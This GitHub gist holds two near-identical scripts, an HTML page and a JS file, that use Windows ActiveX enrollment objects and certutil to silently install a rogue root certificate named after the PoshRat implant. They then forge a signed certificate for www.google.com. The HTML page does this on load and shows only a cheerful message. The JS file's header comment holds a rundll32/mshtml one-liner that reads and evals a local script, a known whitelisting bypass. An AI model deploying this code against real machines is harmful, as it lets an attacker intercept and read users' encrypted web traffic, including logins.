Skip to content

Instantly share code, notes, and snippets.

@johnjohnsp1

johnjohnsp1/jsenroll.html

Created December 30, 2015 19:04
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save johnjohnsp1/1434a09bad58ffce504b to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save johnjohnsp1/1434a09bad58ffce504b to your computer and use it in GitHub Desktop.
Download ZIP
Creates and Installs a Certificate in User Store - Windows -Work In Progress
Raw
jsenroll.html
<html>
<head>
<script>
function InvokeCreateCertificate(certSubject, isCA)
{
var CAsubject = certSubject;
var dn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
dn.Encode( "CN=" + CAsubject, 0);
var issuer = "__PoshRat_Trusted_Root";
var issuerdn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
issuerdn.Encode("CN=" + issuer, 0);
var key = new ActiveXObject("X509Enrollment.CX509PrivateKey");
key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider";
if(isCA)
{
key.KeySpec = 2 ;
}
else
{
key.KeySpec = 1;
}
key.Length = 1024;
key.MachineContext = 0;
//https://msdn.microsoft.com/en-us/library/windows/desktop/aa379412(v=vs.85).aspx
key.ExportPolicy = 11;
key.Create() ;
var serverauthoid = new ActiveXObject("X509Enrollment.CObjectId");
serverauthoid.InitializeFromValue("1.3.6.1.5.5.7.3.1");
var ekuoids = new ActiveXObject("X509Enrollment.CObjectIds.1");
ekuoids.Add(serverauthoid);
var ekuext = new ActiveXObject("X509Enrollment.CX509ExtensionEnhancedKeyUsage");
ekuext.InitializeEncode(ekuoids);
var cert = new ActiveXObject("X509Enrollment.CX509CertificateRequestCertificate");
cert.InitializeFromPrivateKey(1, key, "");
cert.Subject = dn;
cert.Issuer = issuerdn;
cert.NotBefore = "12/31/2014";
cert.NotAfter = "12/31/2025";
var hashAlgorithmObject = new ActiveXObject("X509Enrollment.CObjectId");
hashAlgorithmObject.InitializeFromAlgorithmName(1,0,0,"SHA256");
cert.HashAlgorithm = hashAlgorithmObject;
cert.X509Extensions.Add(ekuext)
if (isCA)
{
var basicConst = new ActiveXObject("X509Enrollment.CX509ExtensionBasicConstraints");
basicConst.InitializeEncode("true", 1);
cert.X509Extensions.Add(basicConst);
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
var certdata = enrollment.CreateRequest(0);
enrollment.InstallResponse(2, certdata, 0, "");
var oShell = new ActiveXObject("WScript.Shell");
var oExec = oShell.Exec('certutil -store -user MY __PoshRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
var oExec = oShell.Exec('certutil -exportPFX -p password -user My '+ serial +' C:\\Windows\\Tasks\\cert.pfx');
var start = new Date().getTime();
for (var i = 0; i < 1e7; i++) {
if ((new Date().getTime() - start) > 5000){
break;
}
}
var oExec = oShell.Exec('certutil -f -p password -user -importpfx C:\\Windows\\Tasks\\cert.pfx');
}
else
{
var oShell = new ActiveXObject("WScript.Shell");
var oExec = oShell.Exec('certutil -store -user MY __PoshRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
var signerCertificate = new ActiveXObject("X509Enrollment.CSignerCertificate");
signerCertificate.Initialize(0,0,4, serial)
cert.SignerCertificate = signerCertificate
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
var certdata = enrollment.CreateRequest(0);
enrollment.InstallResponse(2, certdata, 0, "");
}
}
InvokeCreateCertificate("__PoshRat_Trusted_Root", true);
InvokeCreateCertificate("www.google.com", false);
</script>
</head>
<body>
Hello We just Added A Cert. Thanks!
</body>
</html>
Raw
jsenroll.js
//rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\\Bypass\\jsenroll.js",1);eval(f.ReadAll());
//certutil -f -p password -user -importpfx cert.pfx
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
*/
function InvokeCreateCertificate(certSubject, isCA)
{
var CAsubject = certSubject;
var dn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
dn.Encode( "CN=" + CAsubject, 0);
var issuer = "__PoshRat_Trusted_Root";
var issuerdn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
issuerdn.Encode("CN=" + issuer, 0);
var key = new ActiveXObject("X509Enrollment.CX509PrivateKey");
key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider";
if(isCA)
{
key.KeySpec = 2 ;
}
else
{
key.KeySpec = 1;
}
key.Length = 1024;
key.MachineContext = 0;
//https://msdn.microsoft.com/en-us/library/windows/desktop/aa379412(v=vs.85).aspx
key.ExportPolicy = 11;
key.Create() ;
var serverauthoid = new ActiveXObject("X509Enrollment.CObjectId");
serverauthoid.InitializeFromValue("1.3.6.1.5.5.7.3.1");
var ekuoids = new ActiveXObject("X509Enrollment.CObjectIds.1");
ekuoids.Add(serverauthoid);
var ekuext = new ActiveXObject("X509Enrollment.CX509ExtensionEnhancedKeyUsage");
ekuext.InitializeEncode(ekuoids);
var cert = new ActiveXObject("X509Enrollment.CX509CertificateRequestCertificate");
cert.InitializeFromPrivateKey(1, key, "");
cert.Subject = dn;
cert.Issuer = issuerdn;
cert.NotBefore = "12/31/2014";
cert.NotAfter = "12/31/2025";
var hashAlgorithmObject = new ActiveXObject("X509Enrollment.CObjectId");
hashAlgorithmObject.InitializeFromAlgorithmName(1,0,0,"SHA256");
cert.HashAlgorithm = hashAlgorithmObject;
cert.X509Extensions.Add(ekuext)
if (isCA)
{
var basicConst = new ActiveXObject("X509Enrollment.CX509ExtensionBasicConstraints");
basicConst.InitializeEncode("true", 1);
cert.X509Extensions.Add(basicConst);
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
var certdata = enrollment.CreateRequest(0);
enrollment.InstallResponse(2, certdata, 0, "");
var oShell = new ActiveXObject("WScript.Shell");
var oExec = oShell.Exec('certutil -store -user MY __PoshRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
var oExec = oShell.Exec('certutil -exportPFX -p "password" -user My '+ serial +' cert.pfx');
var oExec = oShell.Exec('certutil -f -p password -user -importpfx cert.pfx');
}
else
{
var oShell = new ActiveXObject("WScript.Shell");
var oExec = oShell.Exec('certutil -store -user MY __PoshRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
var signerCertificate = new ActiveXObject("X509Enrollment.CSignerCertificate");
signerCertificate.Initialize(0,0,4, serial)
cert.SignerCertificate = signerCertificate
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
var certdata = enrollment.CreateRequest(0);
enrollment.InstallResponse(2, certdata, 0, "");
}
}
InvokeCreateCertificate("__PoshRat_Trusted_Root", true);
InvokeCreateCertificate("www.google.com", false);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment